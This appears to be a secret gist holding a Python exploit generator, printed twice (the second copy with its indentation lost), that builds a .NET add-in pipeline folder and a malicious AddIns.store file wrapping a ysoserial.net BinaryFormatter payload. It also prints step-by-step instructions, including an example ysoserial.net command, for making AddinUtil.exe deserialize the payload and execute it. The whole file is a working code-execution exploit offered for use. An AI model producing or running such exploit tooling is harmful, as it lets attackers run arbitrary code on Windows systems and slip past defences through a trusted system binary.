two06/pipeline_exploit.py Secret

## pipeline_exploit.py
import os
import sys
import struct
import argparse

def create_addin_exploit(payload_file, output_dir):
    # Create the main pipeline directory
    print(f"[+] Creating pipeline directory structure in {output_dir}")
    os.makedirs(output_dir, exist_ok=True)

    # Create required pipeline subdirectories
    pipeline_dirs = [
        "HostSideAdapters",
        "Contracts",
        "AddInSideAdapters",
        "AddInViews",
        "AddIns"  # Add the AddIns directory
    ]

    for dir_name in pipeline_dirs:
        dir_path = os.path.join(output_dir, dir_name)
        os.makedirs(dir_path, exist_ok=True)
        # Create empty README files to make directories non-empty
        with open(os.path.join(dir_path, "README.txt"), 'w') as f:
            f.write(f"Dummy file for {dir_name} directory")

    # Read the ysoserial.net payload from file
    print(f"[+] Reading payload from {payload_file}")
    with open(payload_file, 'rb') as f:
        payload_data = f.read()

    # Create the AddIns.store file inside the AddIns directory
    print("[+] Creating malicious AddIns.store file")
    addins_dir = os.path.join(output_dir, "AddIns")
    addins_store_path = os.path.join(addins_dir, "AddIns.store")

    with open(addins_store_path, 'wb') as f:
        # Write the format version (int32 = 1)
        f.write(struct.pack("<i", 1))

        # Write the payload size (int64)
        f.write(struct.pack("<q", len(payload_data)))

        # Write the payload data
        f.write(payload_data)

    print(f"[+] Exploit created successfully in {output_dir}")
    print(f"[+] To trigger the exploit, run:")
    print(f"    AddinUtil.exe -addinroot:{addins_dir}")
    return addins_store_path

def main():
    parser = argparse.ArgumentParser(description='Generate AddinUtil BinaryFormatter deserialization exploit')
    parser.add_argument('payload_file', help='Path to the ysoserial.net generated payload file')
    parser.add_argument('--output-dir', '-o', default='./exploit', help='Output directory for the exploit (default: ./exploit)')

    args = parser.parse_args()

    if not os.path.exists(args.payload_file):
        print(f"Error: Payload file '{args.payload_file}' not found", file=sys.stderr)
        return 1

    try:
        addins_file = create_addin_exploit(args.payload_file, args.output_dir)
        print("\n[+] File created:")
        print(f"    AddIns.store: {addins_file}")
        print("\n[+] Instructions:")
        print("1. Generate a ysoserial.net payload with an appropriate gadget chain")
        print("   Example: ysoserial.net -f BinaryFormatter -g TypeConfuseDelegate -c calc -o raw > payload.bin")
        print(f"2. Run this script: python addinutil_exploit.py payload.bin")
        print(f"3. Execute AddinUtil.exe with: AddinUtil.exe -addinroot:{os.path.join(args.output_dir, 'AddIns')}")
        print("\n[+] Done! When AddinUtil.exe loads the store file, the payload should execute")
    except Exception as e:
        print(f"Error: {str(e)}", file=sys.stderr)
        return 1

    return 0

if __name__ == "__main__":
    sys.exit(main())
	import os
	import sys
	import struct
	import argparse

	def create_addin_exploit(payload_file, output_dir):
	# Create the main pipeline directory
	print(f"[+] Creating pipeline directory structure in {output_dir}")
	os.makedirs(output_dir, exist_ok=True)

	# Create required pipeline subdirectories
	pipeline_dirs = [
	"HostSideAdapters",
	"Contracts",
	"AddInSideAdapters",
	"AddInViews",
	"AddIns" # Add the AddIns directory
	]

	for dir_name in pipeline_dirs:
	dir_path = os.path.join(output_dir, dir_name)
	os.makedirs(dir_path, exist_ok=True)
	# Create empty README files to make directories non-empty
	with open(os.path.join(dir_path, "README.txt"), 'w') as f:
	f.write(f"Dummy file for {dir_name} directory")

	# Read the ysoserial.net payload from file
	print(f"[+] Reading payload from {payload_file}")
	with open(payload_file, 'rb') as f:
	payload_data = f.read()

	# Create the AddIns.store file inside the AddIns directory
	print("[+] Creating malicious AddIns.store file")
	addins_dir = os.path.join(output_dir, "AddIns")
	addins_store_path = os.path.join(addins_dir, "AddIns.store")

	with open(addins_store_path, 'wb') as f:
	# Write the format version (int32 = 1)
	f.write(struct.pack("<i", 1))

	# Write the payload size (int64)
	f.write(struct.pack("<q", len(payload_data)))

	# Write the payload data
	f.write(payload_data)

	print(f"[+] Exploit created successfully in {output_dir}")
	print(f"[+] To trigger the exploit, run:")
	print(f" AddinUtil.exe -addinroot:{addins_dir}")
	return addins_store_path

	def main():
	parser = argparse.ArgumentParser(description='Generate AddinUtil BinaryFormatter deserialization exploit')
	parser.add_argument('payload_file', help='Path to the ysoserial.net generated payload file')
	parser.add_argument('--output-dir', '-o', default='./exploit', help='Output directory for the exploit (default: ./exploit)')

	args = parser.parse_args()

	if not os.path.exists(args.payload_file):
	print(f"Error: Payload file '{args.payload_file}' not found", file=sys.stderr)
	return 1

	try:
	addins_file = create_addin_exploit(args.payload_file, args.output_dir)
	print("\n[+] File created:")
	print(f" AddIns.store: {addins_file}")
	print("\n[+] Instructions:")
	print("1. Generate a ysoserial.net payload with an appropriate gadget chain")
	print(" Example: ysoserial.net -f BinaryFormatter -g TypeConfuseDelegate -c calc -o raw > payload.bin")
	print(f"2. Run this script: python addinutil_exploit.py payload.bin")
	print(f"3. Execute AddinUtil.exe with: AddinUtil.exe -addinroot:{os.path.join(args.output_dir, 'AddIns')}")
	print("\n[+] Done! When AddinUtil.exe loads the store file, the payload should execute")
	except Exception as e:
	print(f"Error: {str(e)}", file=sys.stderr)
	return 1

	return 0

	if __name__ == "__main__":
	sys.exit(main())